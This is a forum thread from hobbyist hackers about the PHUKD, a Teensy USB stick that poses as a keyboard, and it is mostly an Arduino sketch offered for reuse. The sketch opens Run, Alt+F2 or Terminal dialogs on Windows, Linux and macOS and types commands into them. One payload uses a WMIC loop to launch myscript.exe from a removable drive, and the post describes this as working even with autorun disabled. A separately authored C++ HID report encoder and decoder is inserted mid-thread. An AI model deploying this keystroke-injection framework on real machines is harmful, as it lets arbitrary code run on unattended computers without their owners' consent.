Phukd


haxwithaxe


DUCKY CODE RELEASE TODAY!!!!!! YIPPY!!!!!! ^u^

>:( no code yet sorry

EDIT: I would encourage people to transition to the usbducky section of the forum with any further suggestions and questions. If what Darren is putting out is better than this I will not be updating this thread with the code.

This is the first thread here on the PHUKD? Really?

If you are looking for the USBDucky then hold on, it's on its way, but this ain't it.

Darren has been working for about a year on the USBDucky and it will certainly be good. So get your Teensy and some other parts I'm not comfortable talking about ('cause I'm not sure Darren will use them) and play with Irongeek's and my code, but keep an eye out for the USBDucky on Hak5. IT WILL BE GOOD. The conversation on #hak5 included the words "plug and play" and "turnkey" in reference to the USBDucky, so if this ain't good it'll at least be easy to get up and running, but after a year of work I can't imagine it will be anything but amazing.

So for those of you who don't know, the PHUKD is this doohickey --> http://www.irongeek.com/i.php?page=securit...eystroke-dongle

Some parts you might consider getting regardless of what Darren does:

- LEDs for feedback

- microSD slot (the breakout boards are just as tiny so unless you are a huge soldering noob go for the slot by itself)

- USB adapter for the miniB port (miniB to regularA double-male)

- a 2 position switch to arm it and disarm it

I suggest the microSD slot because I will be adding support for using the Teensy as a mass storage device or running code on the Teensy from the SD card if Darren hasn't when he releases the Ducky.

Here is one thing left out of the article:

* in the Arduino GUI go to: Sketch > Add File and add all the files in arduino-xxxx/hardware/teensy/cores/teensy_hid/

I have not tested if all the files are needed but I have bigger fish to fry at the moment.

Go to: Tools > Board > <your teensy model> (USB Keyboard/Mouse)

Here are some changes I made to the original example.

As is, this will just blink (you won't see it since it happens so fast); you need to put a call to a payload function in the place the comments say to, or you can uncomment one of mine.

EDIT: Added some more functions and updated some info.

EDIT (3/31/2010 12:22): Oh holy shit, Apple sucks big hairy donkey balls: no run dialog and funny keys >:( Working on the AppleCommandRun function. What is below is the best I can do right now; I have no Mac (just a VM), so I was lucky enough to get HaDak from #hak5 to find the keycode for the Apple key. I need to do some getting-paid fooling around though, so I can't test it today.

EDIT (4/1/2010): fixed path for Apple payload's TextEdit demo

EDIT (4/2/2010): Omi has fixed the AppleCommandRun and I am going to buy a copy of Snow Leopard to test with as soon as I get paid.

 
/* The following is Irongeek's code (with many additions and subtractions by haxwithaxe and Omidenchin (aka Omi)) to do simple keyboard/mouse functions with the Teensy, including
 something like U3 functionality that will work even if autorun is disabled.
 NOTE: haxwithaxe has removed the DIP switch code because he doesn't have a DIP switch to play with, but it can just as easily be put back in and used to
       select the payload. It is strongly recommended that you go to Irongeek's site and not only look at his code but watch the accompanying video right
       above the code example.

 Original Source: http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
 Also see his updated source with some of my stuff in it.

 To learn more about Teensyduino see:
 http://www.pjrc.com/teensy/teensyduino.html
 Look in arduino-xxxx\hardware\teensy\cores\teensy_hid\usb_api.h for key definitions
 Edit arduino-xxxx\hardware\teensy\cores\teensy_hid\usb_private.h to change the USB Vendor and Product ID

 To learn more about keyboard shortcuts:
 Apple: http://support.apple.com/kb/ht1343
 Windows: http://support.microsoft.com/kb/126449
 Gnome/KDE: http://www.novell.com/coolsolutions/tip/2289.html
 Please add more to this list if you can think of any window managers that have default keyboard shortcuts.
*/

int ledPin = 6; // LED connected to digital pin 11 for teensy2 and pin 6 for teensy2++

// The setup() method runs once, when the sketch starts
void setup() { 
  // initialize the digital pin as an output:
  pinMode(ledPin, OUTPUT);  
}

// the loop() method runs over and over again,
// as long as the Arduino has power
void loop() {
  delay(1000); // wait for host to listen
  digitalWrite(ledPin, HIGH); // set the LED on
  // os detection and payload go here
  //LinuxPayload();
  //WindowsPayload();
  //ApplePayload();
  digitalWrite(ledPin, LOW); // set the LED off
  delay(15000); //keeps commands from being sent one after the other too fast
}

void LinuxPayload(){
  GnomeKDECommandRun("xterm -e \"echo kill all humans! ... 01010001 > pwnd && cat pwnd -\"");
  // run drive finding cmd to be ripped from casper hopefully it'll be a "one liner"
  // i dont exist yet T_T
  // also waiting for Darren's USBDucky example code to see if he has gotten around doing this
}

void WindowsPayload(){
  WindowsCommandRun("notepad.exe");
  delay(1000);
  Keyboard.print("Irongeek was here!!! }:)");

  WindowsCommandRun("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"MYDISK\"') do %i\\myscript.exe");
}

void ApplePayload(){
  AppleCommandRun("/Applications/TextEdit.app/Contents/MacOS/TextEdit"); // open text editor
  delay(1000);
  Keyboard.print("hax was here!!! }:)"); // type message
  // or
  AppleCommandRun("echo kill all humans! ... 01010001"); // print a message directly in the terminal
  // run drive finding command
  // i don't own a mac so please feel free to make something up for me
  // also waiting for Darren's USBDucky example code to see if he has gotten around doing this
}

void WindowsCommandRun(const char *SomeCommand){
  KeyCombo(MODIFIERKEY_GUI,KEY_R); // open run dialog (Win+R)
  delay(1500); // wait for it to open
  Keyboard.print(SomeCommand); // enter some command
  KeyPress(KEY_ENTER); // exec some command
}

void GnomeKDECommandRun(const char *SomeCommand){
  KeyCombo(MODIFIERKEY_ALT,KEY_F2); // open run dialog (Alt+F2)
  delay(1500); // wait for it to open
  Keyboard.print(SomeCommand); // enter some command
  KeyPress(KEY_ENTER); // exec some command
}

// this now works
void AppleCommandRun(const char *SomeCommand){
  KeyCombo(MODIFIERKEY_GUI,KEY_SPACE); // "apple" aka command key + space -- open Spotlight
  delay(1500); // wanna make this as short as possible
  Keyboard.print("Terminal.app"); // type Terminal.app
  delay(1000); // wanna make this as short as possible
  KeyPress(KEY_ENTER); // press enter to launch Terminal
  delay(1500); // wait for the Terminal window to take focus
  Keyboard.print(SomeCommand); // enter command
  KeyPress(KEY_ENTER); // run command
}

void KeyPress(int SomeKey) {
  Keyboard.set_key1(SomeKey); // set some key
  Keyboard.send_now(); // "press" some key
  // clear some key
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void KeyCombo(int ModKey,int SomeKey) {
  Keyboard.set_modifier(ModKey); //set one or more modifier keys
  Keyboard.set_key1(SomeKey); // set regular key
  Keyboard.send_now(); // send strokes
  // clear keys
  Keyboard.set_modifier(0); // prep release of control keys
  Keyboard.set_key1(0); // have to do this to keep it from hitting key multiple times.
  Keyboard.send_now();
}

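The KeyPress() and KeyCombo() helpers above send a second, all-zero report to "release" the key, and the comment says it is needed to keep the key from being hit multiple times. The following is an added example (my code, not haxwithaxe's, Irongeek's or the Teensyduino library's) that models the 8-byte USB boot-protocol keyboard reports Keyboard.send_now() puts on the wire: an encoder that mirrors what Keyboard.print() sends, a decoder that turns a report stream back into text the way the host does (which also works on reports pulled from a USB capture), and a constructed stream of two "press a" reports with no release between them to show what goes wrong. It assumes a US keyboard layout; the HidReport struct and the names encodeText, keyCombo, decodeReports and heldKeyStream are mine, not anything in the thread.

```cpp
// Added example, not from the thread: USB HID boot-keyboard report encoder/decoder.
// Assumes a US keyboard layout. Usage ids are from the USB HID Usage Tables.
#include <algorithm>
#include <array>
#include <cstdint>
#include <stdexcept>
#include <string>
#include <utility>
#include <vector>

// One boot-protocol keyboard report: modifier bitmap, reserved byte, up to 6 keys.
struct HidReport {
    uint8_t modifier = 0;
    uint8_t reserved = 0;
    std::array<uint8_t, 6> keys{};
};

constexpr uint8_t MOD_LEFT_SHIFT  = 0x02;  // HID modifier bits
constexpr uint8_t MOD_LEFT_GUI    = 0x08;  // "Windows"/Command key
constexpr uint8_t MOD_RIGHT_SHIFT = 0x20;
constexpr uint8_t KEY_R_USAGE     = 0x15;  // usage id of 'r'; GUI+R is the Windows run dialog

// ASCII -> (HID usage id, needs Shift). Usage 0 means "no key on a US layout".
static std::pair<uint8_t, bool> asciiToUsage(char c) {
    if (c >= 'a' && c <= 'z') return {uint8_t(0x04 + (c - 'a')), false};
    if (c >= 'A' && c <= 'Z') return {uint8_t(0x04 + (c - 'A')), true};
    if (c >= '1' && c <= '9') return {uint8_t(0x1E + (c - '1')), false};
    static const char    unshifted[] = "0-=[]\\;'`,./";
    static const char    shifted[]   = ")_+{}|:\"~<>?";
    static const uint8_t usages[]    = {0x27, 0x2D, 0x2E, 0x2F, 0x30, 0x31,
                                        0x33, 0x34, 0x35, 0x36, 0x37, 0x38};
    for (size_t i = 0; i < sizeof(usages); ++i) {
        if (c == unshifted[i]) return {usages[i], false};
        if (c == shifted[i])   return {usages[i], true};
    }
    static const char shiftedDigits[] = "!@#$%^&*(";   // Shift+1 .. Shift+9
    for (size_t i = 0; i < 9; ++i)
        if (c == shiftedDigits[i]) return {uint8_t(0x1E + i), true};
    if (c == ' ')  return {0x2C, false};
    if (c == '\n') return {0x28, false};   // Enter
    if (c == '\t') return {0x2B, false};   // Tab
    return {0, false};
}

// Text -> report stream as Keyboard.print() sends it: for every character a
// "press" report followed by an all-zero "release" report.
std::vector<HidReport> encodeText(const std::string& text) {
    std::vector<HidReport> out;
    for (char c : text) {
        std::pair<uint8_t, bool> m = asciiToUsage(c);
        if (m.first == 0) throw std::invalid_argument(std::string("no US-layout key for: ") + c);
        HidReport press;
        press.modifier = m.second ? MOD_LEFT_SHIFT : 0;
        press.keys[0]  = m.first;
        out.push_back(press);
        out.push_back(HidReport{});   // release; without it the host sees the key as still held
    }
    return out;
}

// Modifier+key chord such as GUI+R (what KeyCombo() does): one press, one release.
std::vector<HidReport> keyCombo(uint8_t modifier, uint8_t usage) {
    HidReport press;
    press.modifier = modifier;
    press.keys[0]  = usage;
    return {press, HidReport{}};
}

// Reverse lookup for the decoder: scan ASCII for the (usage, shift) pair.
static char usageToAscii(uint8_t usage, bool shifted) {
    for (int c = 0x09; c < 0x7F; ++c) {
        std::pair<uint8_t, bool> m = asciiToUsage(static_cast<char>(c));
        if (m.first == usage && m.second == shifted) return static_cast<char>(c);
    }
    return '?';
}

// Report stream -> text the way the host sees it: a key produces a character
// only when it is newly pressed relative to the previous report.
std::string decodeReports(const std::vector<HidReport>& reports) {
    std::string out;
    HidReport prev;
    for (const HidReport& r : reports) {
        bool shifted = (r.modifier & (MOD_LEFT_SHIFT | MOD_RIGHT_SHIFT)) != 0;
        for (uint8_t k : r.keys) {
            if (k == 0) continue;
            bool alreadyHeld = std::find(prev.keys.begin(), prev.keys.end(), k) != prev.keys.end();
            if (!alreadyHeld) out += usageToAscii(k, shifted);
        }
        prev = r;
    }
    return out;
}

// Constructed failure case: two "press a" reports with no release in between.
// The host treats this as one held key, so the second 'a' never appears.
std::vector<HidReport> heldKeyStream() {
    HidReport press;
    press.keys[0] = asciiToUsage('a').first;
    return {press, press};
}
```

decodeReports(encodeText("aa")) gives "aa", while decodeReports(heldKeyStream()) gives only "a": the host deduplicates a key that stays set across consecutive reports, which is why every press in the sketch above is followed by a cleared report. The same decoder applied to 8-byte interrupt transfers from a USB capture recovers what a PHUKD typed.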

I've updated my site, and the code:

http://www.irongeek.com/i.php?page=securit...eystroke-dongle

I think I need to add some of your functions, just to make coding keystrokes easier. I've made a function to repeat keystrokes you have to hit many times in a row, like tab. I've also added better code for checking the photoresistor and doing something based on light, and a timer function so you can leave the PHUKD behind to wait for someone to log in.


AppleCommandRun("/Applications/TextEdit.app/Contents/TextEdit");

Isn't it /Applications/TextEdit.app/Contents/MacOS/TextEdit ?

It could well be. I only have a copy of deadmoo to work from but I have a mac owner working with me now so I'll see tonight I hope.

Just checked with the mac users on #hak5 and they confirmed my path was wrong



BTW, instead of:

/Path/To/Application.app/Contents/MacOS/Application

you can do

open -a /Path/To/Application.app

Which is easier for some applications where the name of the .app bundle is not the same as the name of the executable itself.
